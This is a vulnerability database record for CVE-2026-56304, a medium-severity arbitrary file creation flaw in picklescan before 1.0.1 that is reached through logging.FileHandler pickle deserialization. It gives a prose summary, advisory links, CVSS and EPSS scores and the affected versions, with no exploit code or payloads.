CVE-2026-56304
MEDIUMpicklescan - Arbitrary File Creation via logging.FileHandler Deserialization
Title source: cnaDescription
picklescan before 1.0.1 contains an unsafe pickle deserialization vulnerability allowing unauthenticated attackers to create arbitrary zero-byte files via logging.FileHandler class instantiation. Attackers can exploit this by crafting malicious pickle payloads to bypass RCE blocklists and create lock files or other filesystem artifacts, potentially causing denial of service or application disruption.
References (2)
Core 2
Core References
Vendor Advisory vendor-advisory
GHSA Advisory GHSA-m7j5-r2p5-c39r
https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m7j5-r2p5-c39r
Third Party Advisory third-party-advisory
VulnCheck Advisory: picklescan - Arbitrary File Creation via logging.FileHandler Deserialization
https://www.vulncheck.com/advisories/picklescan-arbitrary-file-creation-via-logging-filehandler-deserialization
Scores
CVSS v3
6.5
EPSS
0.0029
EPSS Percentile
20.5%
Attack Vector
NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
CISA SSVC
Vulnrichment
Exploitation
poc
Automatable
yes
Technical Impact
partial
Details
CWE
CWE-502
Status
published
Products (3)
mmaitre314/picklescan
< 1.0.1
picklescan/picklescan
< 1.0.1
picklescan/picklescan
1.0.1
Published
Jun 20, 2026
Tracked Since
Jun 20, 2026